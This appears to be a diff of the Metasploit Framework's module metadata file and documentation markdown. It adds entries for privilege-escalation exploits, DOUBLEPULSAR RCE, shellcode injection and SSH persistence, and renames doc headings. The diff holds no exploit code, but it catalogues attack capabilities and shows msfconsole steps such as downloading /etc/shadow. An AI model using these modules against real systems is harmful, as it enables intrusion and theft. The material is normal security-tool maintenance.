@@ -127521,7 +128193,7 @@
    "targets": [
      "Windows x64"
    ],
-    "mod_time": "2018-07-27 11:35:31 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/local/mov_ss.rb",
    "is_install_path": true,
    "ref_name": "windows/local/mov_ss",
@@ -128251,7 +128923,7 @@
    "targets": [
      "Windows 7 SP1"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/local/ms16_016_webdav.rb",
    "is_install_path": true,
    "ref_name": "windows/local/ms16_016_webdav",
@@ -128296,7 +128968,7 @@
      "Windows x86",
      "Windows x64"
    ],
-    "mod_time": "2019-07-09 17:36:28 +0000",
+    "mod_time": "2020-01-29 17:11:07 +0000",
    "path": "/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb",
    "is_install_path": true,
    "ref_name": "windows/local/ms16_032_secondary_logon_handle_privesc",
@@ -128749,7 +129421,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2019-10-27 11:25:56 +0000",
+    "mod_time": "2019-12-18 16:06:26 +0000",
    "path": "/modules/exploits/windows/local/payload_inject.rb",
    "is_install_path": true,
    "ref_name": "windows/local/payload_inject",
@@ -128789,7 +129461,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/local/persistence.rb",
    "is_install_path": true,
    "ref_name": "windows/local/persistence",
@@ -128830,7 +129502,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-11-16 04:58:02 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/local/persistence_image_exec_options.rb",
    "is_install_path": true,
    "ref_name": "windows/local/persistence_image_exec_options",
@@ -128880,6 +129552,54 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/local/plantronics_hub_spokesupdateservice_privesc": {
+    "name": "Plantronics Hub SpokesUpdateService Privilege Escalation",
+    "fullname": "exploit/windows/local/plantronics_hub_spokesupdateservice_privesc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-08-30",
+    "type": "exploit",
+    "author": [
+      "Markus Krell",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "The Plantronics Hub client application for Windows makes use of an\n        automatic update service `SpokesUpdateService.exe` which automatically\n        executes a file specified in the `MajorUpgrade.config` configuration\n        file as SYSTEM. The configuration file is writable by all users by default.\n\n        This module has been tested successfully on Plantronics Hub version 3.13.2\n        on Windows 7 SP1 (x64).",
+    "references": [
+      "CVE-2019-15742",
+      "EDB-47845",
+      "URL-https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-01-03 20:32:01 +0000",
+    "path": "/modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/plantronics_hub_spokesupdateservice_privesc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_windows/local/powershell_cmd_upgrade": {
    "name": "Windows Command Shell Upgrade (Powershell)",
    "fullname": "exploit/windows/local/powershell_cmd_upgrade",
@@ -129204,7 +129924,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-03-29 18:14:56 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/local/registry_persistence.rb",
    "is_install_path": true,
    "ref_name": "windows/local/registry_persistence",
@@ -129542,6 +130262,54 @@
    },
    "needs_cleanup": true
  },
+  "exploit_windows/local/windscribe_windscribeservice_priv_esc": {
+    "name": "Windscribe WindscribeService Named Pipe Privilege Escalation",
+    "fullname": "exploit/windows/local/windscribe_windscribeservice_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2018-05-24",
+    "type": "exploit",
+    "author": [
+      "Emin Ghuliev",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "The Windscribe VPN client application for Windows makes use of a\n        Windows service `WindscribeService.exe` which exposes a named pipe\n        `\\.\\pipe\\WindscribeService` allowing execution of programs with\n        elevated privileges.\n\n        Windscribe versions prior to 1.82 do not validate user-supplied\n        program names, allowing execution of arbitrary commands as SYSTEM.\n\n        This module has been tested successfully on Windscribe versions\n        1.80 and 1.81 on Windows 7 SP1 (x64).",
+    "references": [
+      "CVE-2018-11479",
+      "URL-http://blog.emingh.com/2018/05/windscribe-vpn-privilege-escalation.html",
+      "URL-https://pastebin.com/eLG3dpYK"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-02-01 00:41:07 +0000",
+    "path": "/modules/exploits/windows/local/windscribe_windscribeservice_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/windscribe_windscribeservice_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_windows/local/wmi": {
    "name": "Windows Management Instrumentation (WMI) Remote Command Execution",
    "fullname": "exploit/windows/local/wmi",
@@ -129612,7 +130380,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/local/wmi_persistence.rb",
    "is_install_path": true,
    "ref_name": "windows/local/wmi_persistence",
@@ -135204,7 +135972,7 @@
    "targets": [
      "MySQL on Windows"
    ],
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/mysql/mysql_start_up.rb",
    "is_install_path": true,
    "ref_name": "windows/mysql/mysql_start_up",
@@ -136446,7 +137214,7 @@
      "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)",
      "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)"
    ],
-    "mod_time": "2019-11-15 11:14:00 +0000",
+    "mod_time": "2020-01-12 08:19:44 +0000",
    "path": "/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/rdp/cve_2019_0708_bluekeep_rce",
@@ -136460,6 +137228,63 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/rdp/rdp_doublepulsar_rce": {
+    "name": "RDP DOUBLEPULSAR Remote Code Execution",
+    "fullname": "exploit/windows/rdp/rdp_doublepulsar_rce",
+    "aliases": [
+
+    ],
+    "rank": 500,
+    "disclosure_date": "2017-04-14",
+    "type": "exploit",
+    "author": [
+      "Equation Group",
+      "Shadow Brokers",
+      "Luke Jennings",
+      "wvu <wvu@metasploit.com>",
+      "Tom Sellers",
+      "Spencer McIntyre"
+    ],
+    "description": "This module executes a Metasploit payload against the Equation Group's\n        DOUBLEPULSAR implant for RDP.\n\n        While this module primarily performs code execution against the implant,\n        the \"Neutralize implant\" target allows you to disable the implant.",
+    "references": [
+      "URL-https://github.com/countercept/doublepulsar-detection-script"
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": 3389,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Execute payload (x64)",
+      "Neutralize implant"
+    ],
+    "mod_time": "2020-01-29 13:16:02 +0000",
+    "path": "/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/rdp/rdp_doublepulsar_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "DOUBLEPULSAR"
+      ],
+      "RelatedModules": [
+        "exploit/windows/smb/smb_doublepulsar_rce"
+      ],
+      "Stability": [
+        "crash-os-down"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/scada/abb_wserver_exec": {
    "name": "ABB MicroSCADA wserver.exe Remote Code Execution",
    "fullname": "exploit/windows/scada/abb_wserver_exec",
@@ -136734,7 +137559,7 @@
      "CoDeSys v2.3 on Windows XP SP3",
      "CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/scada/codesys_web_server.rb",
    "is_install_path": true,
    "ref_name": "windows/scada/codesys_web_server",
@@ -138101,78 +138926,6 @@
    },
    "needs_cleanup": null
  },
-  "exploit_windows/smb/doublepulsar_rce": {
-    "name": "DOUBLEPULSAR Payload Execution and Neutralization",
-    "fullname": "exploit/windows/smb/doublepulsar_rce",
-    "aliases": [
-
-    ],
-    "rank": 500,
-    "disclosure_date": "2017-04-14",
-    "type": "exploit",
-    "author": [
-      "Equation Group",
-      "Shadow Brokers",
-      "zerosum0x0",
-      "Luke Jennings",
-      "wvu <wvu@metasploit.com>",
-      "Jacob Robles"
-    ],
-    "description": "This module executes a Metasploit payload against the Equation Group's\n        DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n        While this module primarily performs code execution against the implant,\n        the \"Neutralize implant\" target allows you to disable the implant.",
-    "references": [
-      "MSB-MS17-010",
-      "CVE-2017-0143",
-      "CVE-2017-0144",
-      "CVE-2017-0145",
-      "CVE-2017-0146",
-      "CVE-2017-0147",
-      "CVE-2017-0148",
-      "URL-https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html",
-      "URL-https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/",
-      "URL-https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/",
-      "URL-https://github.com/countercept/doublepulsar-detection-script",
-      "URL-https://github.com/countercept/doublepulsar-c2-traffic-decryptor",
-      "URL-https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1"
-    ],
-    "platform": "Windows",
-    "arch": "x64",
-    "rport": 445,
-    "autofilter_ports": [
-      139,
-      445
-    ],
-    "autofilter_services": [
-      "netbios-ssn",
-      "microsoft-ds"
-    ],
-    "targets": [
-      "Execute payload",
-      "Neutralize implant"
-    ],
-    "mod_time": "2019-11-25 18:26:37 +0000",
-    "path": "/modules/exploits/windows/smb/doublepulsar_rce.rb",
-    "is_install_path": true,
-    "ref_name": "windows/smb/doublepulsar_rce",
-    "check": true,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "AKA": [
-        "DOUBLEPULSAR"
-      ],
-      "RelatedModules": [
-        "auxiliary/scanner/smb/smb_ms17_010",
-        "exploit/windows/smb/ms17_010_eternalblue"
-      ],
-      "Stability": [
-        "crash-os-down"
-      ],
-      "Reliability": [
-        "repeatable-session"
-      ]
-    },
-    "needs_cleanup": null
-  },
  "exploit_windows/smb/generic_smb_dll_injection": {
    "name": "Generic DLL Injection From Shared Resource",
    "fullname": "exploit/windows/smb/generic_smb_dll_injection",
@@ -138244,7 +138997,7 @@
      "Windows x86",
      "Windows x64"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-11 09:41:08 +0000",
    "path": "/modules/exploits/windows/smb/group_policy_startup.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/group_policy_startup",
@@ -138252,6 +139005,9 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "AKA": [
+        "badsamba"
+      ]
    },
    "needs_cleanup": null
  },
@@ -139215,7 +139971,7 @@
    "targets": [
      "Windows 7 and Server 2008 R2 (x64) All Service Packs"
    ],
-    "mod_time": "2019-05-22 17:16:06 +0000",
+    "mod_time": "2019-10-30 22:20:36 +0000",
    "path": "/modules/exploits/windows/smb/ms17_010_eternalblue.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms17_010_eternalblue",
@@ -139268,7 +140024,7 @@
    "targets": [
      "win x64"
    ],
-    "mod_time": "2018-10-11 17:23:59 +0000",
+    "mod_time": "2019-11-01 19:20:22 +0000",
    "path": "/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py",
    "is_install_path": true,
    "ref_name": "windows/smb/ms17_010_eternalblue_win8",
@@ -139324,7 +140080,7 @@
      "Native upload",
      "MOF upload"
    ],
-    "mod_time": "2019-05-22 20:05:44 +0000",
+    "mod_time": "2019-10-30 22:20:36 +0000",
    "path": "/modules/exploits/windows/smb/ms17_010_psexec.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms17_010_psexec",
@@ -139523,6 +140279,78 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/smb/smb_doublepulsar_rce": {
+    "name": "SMB DOUBLEPULSAR Remote Code Execution",
+    "fullname": "exploit/windows/smb/smb_doublepulsar_rce",
+    "aliases": [
+      "exploit/windows/smb/doublepulsar_rce"
+    ],
+    "rank": 500,
+    "disclosure_date": "2017-04-14",
+    "type": "exploit",
+    "author": [
+      "Equation Group",
+      "Shadow Brokers",
+      "zerosum0x0",
+      "Luke Jennings",
+      "wvu <wvu@metasploit.com>",
+      "Jacob Robles"
+    ],
+    "description": "This module executes a Metasploit payload against the Equation Group's\n        DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n        While this module primarily performs code execution against the implant,\n        the \"Neutralize implant\" target allows you to disable the implant.",
+    "references": [
+      "MSB-MS17-010",
+      "CVE-2017-0143",
+      "CVE-2017-0144",
+      "CVE-2017-0145",
+      "CVE-2017-0146",
+      "CVE-2017-0147",
+      "CVE-2017-0148",
+      "URL-https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html",
+      "URL-https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/",
+      "URL-https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/",
+      "URL-https://github.com/countercept/doublepulsar-detection-script",
+      "URL-https://github.com/countercept/doublepulsar-c2-traffic-decryptor",
+      "URL-https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1"
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": 445,
+    "autofilter_ports": [
+      139,
+      445
+    ],
+    "autofilter_services": [
+      "netbios-ssn",
+      "microsoft-ds"
+    ],
+    "targets": [
+      "Execute payload (x64)",
+      "Neutralize implant"
+    ],
+    "mod_time": "2020-02-03 11:19:20 +0000",
+    "path": "/modules/exploits/windows/smb/smb_doublepulsar_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/smb/smb_doublepulsar_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "DOUBLEPULSAR"
+      ],
+      "RelatedModules": [
+        "auxiliary/scanner/smb/smb_ms17_010",
+        "exploit/windows/smb/ms17_010_eternalblue"
+      ],
+      "Stability": [
+        "crash-os-down"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/smb/smb_relay": {
    "name": "MS08-068 Microsoft Windows SMB Relay Code Execution",
    "fullname": "exploit/windows/smb/smb_relay",
@@ -142323,7 +143151,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-12-17 19:28:07 +0000",
+    "mod_time": "2019-12-18 12:11:56 +0000",
    "path": "/modules/payloads/singles/bsd/vax/shell_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "bsd/vax/shell_reverse_tcp",
@@ -143498,7 +144326,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 17:34:47 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_lua.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_lua",
@@ -144934,7 +145762,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 17:34:47 +0000",
    "path": "/modules/payloads/singles/cmd/windows/bind_lua.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/bind_lua",
@@ -164984,7 +165812,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-10-28 03:24:20 +0000",
+    "mod_time": "2019-12-13 10:51:58 +0000",
    "path": "/modules/post/multi/recon/local_exploit_suggester.rb",
    "is_install_path": true,
    "ref_name": "multi/recon/local_exploit_suggester",
@@ -166364,7 +167192,7 @@
    "author": [
      "Danil Bazin <danil.bazin@hsc.fr>"
    ],
-    "description": "This module enumerates ways to decrypt bitlocker volume and if a recovery key is stored locally\n        or can be generated, dump the Bitlocker master key (FVEK)",
+    "description": "This module enumerates ways to decrypt Bitlocker volume and if a recovery key is stored locally\n        or can be generated, dump the Bitlocker master key (FVEK)",
    "references": [
      "URL-https://github.com/libyal/libbde/blob/master/documentation/BitLocker Drive Encryption (BDE) format.asciidoc",
      "URL-http://www.hsc.fr/ressources/outils/dislocker/"
@@ -166375,7 +167203,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-09 06:32:22 +0000",
+    "mod_time": "2019-12-11 13:39:25 +0000",
    "path": "/modules/post/windows/gather/bitlocker_fvek.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/bitlocker_fvek",
@@ -168286,7 +169114,7 @@
    "author": [
      "Carlos Perez <carlos_perez@darkoperator.com>"
    ],
-    "description": "This module will enumerate all installed applications",
+    "description": "This module will enumerate all installed applications on a Windows system",
    "references": [

    ],
@@ -168296,7 +169124,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-11 14:10:48 +0000",
    "path": "/modules/post/windows/gather/enum_applications.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_applications",
@@ -168967,7 +169795,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-02 15:33:48 +0000",
+    "mod_time": "2019-12-14 15:58:45 +0000",
    "path": "/modules/post/windows/gather/enum_patches.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_patches",
@@ -169673,7 +170501,7 @@
    "path": "/modules/post/windows/gather/local_admin_search_enum.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/local_admin_search_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -169794,7 +170622,7 @@
    ],
    "description": "This module will change a registry value to enable\n        the sending of LM challenge hashes and then initiate a SMB connection to\n        the SMBHOST datastore. If an SMB server is listening, it will receive the\n        NetLM hashes",
    "references": [
-      "URL-http://www.fishnetsecurity.com/6labs/blog/post-exploitation-using-netntlm-downgrade-attacks"
+      "URL-https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks"
    ],
    "platform": "",
    "arch": "",
@@ -169802,7 +170630,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-28 20:35:57 +0000",
    "path": "/modules/post/windows/gather/netlm_downgrade.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/netlm_downgrade",
@@ -170779,6 +171607,40 @@
    },
    "needs_cleanup": null
  },
+  "post_windows/manage/install_ssh": {
+    "name": "Install OpenSSH for Windows",
+    "fullname": "post/windows/manage/install_ssh",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Michael Long <bluesentinel@protonmail.com>"
+    ],
+    "description": "This module installs OpenSSH server and client for Windows using PowerShell.\n                        SSH on Windows can provide pentesters persistent access to a secure interactive terminal, interactive filesystem access, and port forwarding over SSH.",
+    "references": [
+      "URL-https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_overview",
+      "URL-https://github.com/PowerShell/openssh-portable"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-01-19 19:51:44 +0000",
+    "path": "/modules/post/windows/manage/install_ssh.rb",
+    "is_install_path": true,
+    "ref_name": "windows/manage/install_ssh",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "post_windows/manage/killav": {
    "name": "Windows Post Kill Antivirus and Hips",
    "fullname": "post/windows/manage/killav",
@@ -170825,7 +171687,8 @@
    "disclosure_date": null,
    "type": "post",
    "author": [
-      "Carlos Perez <carlos_perez@darkoperator.com>"
+      "Carlos Perez <carlos_perez@darkoperator.com>",
+      "phra <https://iwantmore.pizza>"
    ],
    "description": "This module will migrate a Meterpreter session from one process\n        to another. A given process PID to migrate to or the module can spawn one and\n        migrate to that newly spawned process.",
    "references": [
@@ -170837,7 +171700,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-17 16:39:18 +0000",
    "path": "/modules/post/windows/manage/migrate.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/migrate",
@@ -171546,6 +172409,39 @@
    },
    "needs_cleanup": null
  },
+  "post_windows/manage/shellcode_inject": {
+    "name": "Windows Manage Memory Shellcode Injection Module",
+    "fullname": "post/windows/manage/shellcode_inject",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "phra <https://iwantmore.pizza>"
+    ],
+    "description": "This module will inject into the memory of a process a specified shellcode.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2019-12-18 16:05:37 +0000",
+    "path": "/modules/post/windows/manage/shellcode_inject.rb",
+    "is_install_path": true,
+    "ref_name": "windows/manage/shellcode_inject",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "post_windows/manage/sticky_keys": {
    "name": "Sticky Keys Persistance Module",
    "fullname": "post/windows/manage/sticky_keys",
@@ -56,7 +56,7 @@ All of the leaked versions are available in the module

 `**` We currently can't distinguish between normal and NPE versions from the SNMP strings. We've commented out the NPE offsets, as NPE is very rare (it is for exporting to places where encryption is crappy), but in the future, we'd like to incorporate these versions. Perhaps as a bool option?

-## Verification
+## Verification Steps

 - Start `msfconsole`
 - `use auxiliary/admin/cisco/cisco_asa_extrabacon`
@@ -1,4 +1,4 @@
-## Introduction
+## Vulnerable Application

 Cisco Data Center Network Manager exposes a servlet to download files on /fm/downloadServlet.
 An authenticated user can abuse this servlet to download arbitrary files as root by specifying
@@ -8,21 +8,7 @@ This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and
 work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit
 (see References to understand why), on the other versions it abuses CVE-2019-1619 to bypass authentication.

-
-## Author and discoverer
-
-Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
-
-
-## References
-
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-file-dwnld
-https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_download.rb
-https://seclists.org/fulldisclosure/2019/Jul/7
-
-
-## Usage
+## Scenarios

 Setup RHOST, pick the file to download (FILENAME, default is /etc/shadow) and enjoy!

@@ -8,7 +8,7 @@ Cambium cnPilot r200/r201 device software versions 4.2.3-R4 and newer, contain a
 4. Do: ```set CMD [command]```
 5. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/http/cnpilot_r_cmd_exec
@@ -1,3 +1,5 @@
+## Vulnerable Application
+
 This module exploits a File Path Traversal vulnerability in Cambium cnPilot r200/r201 devices to read arbitrary files off the file system. Affected versions - 4.3.3-R4 and prior.

 ## Verification Steps
@@ -8,7 +10,7 @@ This module exploits a File Path Traversal vulnerability in Cambium cnPilot r200
 4. Do: ```set FILENAME [filename]```
 5. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/http/cnpilot_r_fpt
@@ -8,7 +8,7 @@ This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000
 4. Do: ```set CMD [COMMAND]```
 5. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/http/epmp1000_get_chart_cmd_exec
@@ -9,7 +9,7 @@ This module exploits an access control vulnerability in Cambium ePMP device mana
 5. Do: ```set NEW_PASSWORD newpass```
 6. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use use auxiliary/scanner/http/epmp1000_reset_pass
@@ -15,7 +15,7 @@ attacker on the local network can send a crafted request to broadcast a fake vid

 Doo-doodoodoodoodoo-doo, Epic Sax Guy will be broadcasted to the remote system.

-## Sample Output
+## Scenarios

 ```
 msf5 > use auxiliary/admin/http/supra_smart_cloud_tv_rfi 
@@ -64,7 +64,7 @@ msf auxiliary(phoenix_command) > run
 [*] Auxiliary module execution completed
 ```

-## Module Options
+## Options
 ```
 msf auxiliary(phoenix_command) > show options

@@ -1,10 +1,12 @@
+## Vulnerable Application
+
 The ```auxiliary/client/mms/send_mms``` module allows you to send a malicious attachment to a
 collection of phone numbers of the same carrier.

 In order to use this module, you must set up your own SMTP server to deliver messages. Popular
 mail services such as Gmail, Yahoo, Live should work fine.

-## Module Options
+## Options

 **CELLNUMBERS**

@@ -74,7 +76,7 @@ in order to receive the text, such as AT&T.

 The MMS subject. Some carriers require this in order to receive the text, such as AT&T.

-## Supported Carrier Gateways
+### Supported Carrier Gateways

 The module supports the following carriers:

@@ -84,14 +86,14 @@ The module supports the following carriers:
 * Verizon
 * Google Fi

-## Finding the Carrier for a Phone Number
+### Finding the Carrier for a Phone Number

 Since you need to manually choose the carrier gateway for the phone numbers, you need to figure out
 how to identify the carrier of a phone number. There are many services that can do this, such as:

 http://freecarrierlookup.com/

-## Gmail SMTP Example
+### Gmail SMTP Example

 Gmail is a popular mail server, so we will use this as a demonstration.

@@ -111,7 +113,7 @@ After creating the application password, configure auxiliary/client/mms/send_mms

 And you should be ready to go.

-## Yahoo SMTP Example
+### Yahoo SMTP Example

 Yahoo is also a fairly popular mail server (although much slower to deliver comparing to Gmail),
 so we will demonstrate as well.
@@ -136,7 +138,7 @@ After configuring your Yahoo account, configure auxiliary/client/mms/send_mms th

 And you're good to go.

-## Demonstration
+## Scenarios

 After setting up your mail server and the module, your output should look similar to this:

@@ -1,10 +1,12 @@
+## Vulnerable Application
+
 The ```auxiliary/client/sms/send_text``` module allows you to send a malicious text/link to a collection
 of phone numbers of the same carrier.

 In order to use this module, you must set up your own SMTP server to deliver messages. Popular
 mail services such as Gmail, Yahoo, Live should work fine.

-## Module Options
+## Options

 **CELLNUMBERS**

@@ -57,7 +59,7 @@ The password you use to log into the SMTP server.

 The FROM field of SMTP. In some cases, it may be used as ```SMTPUSER```.

-## Supported Carrier Gateways
+### Supported Carrier Gateways

 The module supports the following carriers:

@@ -73,7 +75,7 @@ The module supports the following carriers:
 **Note:** During development, we could not find a valid gateway for Sprint, therefore it is currently
 not supported.

-## Finding the Carrier for a Phone Number
+### Finding the Carrier for a Phone Number

 Since you need to manually choose the carrier gateway for the phone numbers, you need to figure out
 how to identify the carrier of a phone number. There are many services that can do this, such as:
@@ -82,7 +84,7 @@ http://freecarrierlookup.com/

 **Note:** If the phone is using Google Fi, then it may appear as a different carrier.

-## Gmail SMTP Example
+### Gmail SMTP Example

 Gmail is a popular mail server, so we will use this as a demonstration.

@@ -100,7 +102,7 @@ After creating the application password, configure auxiliary/client/sms/send_tex

 And you should be ready to go.

-## Yahoo SMTP Example
+### Yahoo SMTP Example

 Yahoo is also a fairly popular mail server (although much slower to deliver comparing to Gmail),
 so we will demonstrate as well.
@@ -123,7 +125,7 @@ After configuring your Yahoo account, configure auxiliary/client/sms/send_text t

 And you're good to go.

-## Demonstration
+### Scenarios

 After setting up your mail server and the module, your output should look similar to this:

@@ -3,7 +3,7 @@ This module triggers a Denial of Service vulnerability in the Flexense Enterpris
 a write access memory vialation via rapidly sending HTTP requests with large HTTP header values.  


-## Vulnerable Application 
+## Verification Steps
 According To publicly exploit Disclosure of Flexense HTTP Server v10.6.24
 Following list of softwares are vulnerable to Denial Of Service.
 read more : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8065
@@ -15,7 +15,7 @@ Vulnerable app versions include:

 Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999385

-## Verification
+## Verification Steps

 1. Start msfconsole
 1. `use auxiliary/dos/http/ibm_lotus_notes.rb`
@@ -15,7 +15,7 @@ IBM Notes 8.5 release

 Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999384 

-## Verification
+## Verification Steps

 Start msfconsole

@@ -0,0 +1,36 @@
+## Vulnerable Application
+
+ Metasploit Framework before version 5.0.28
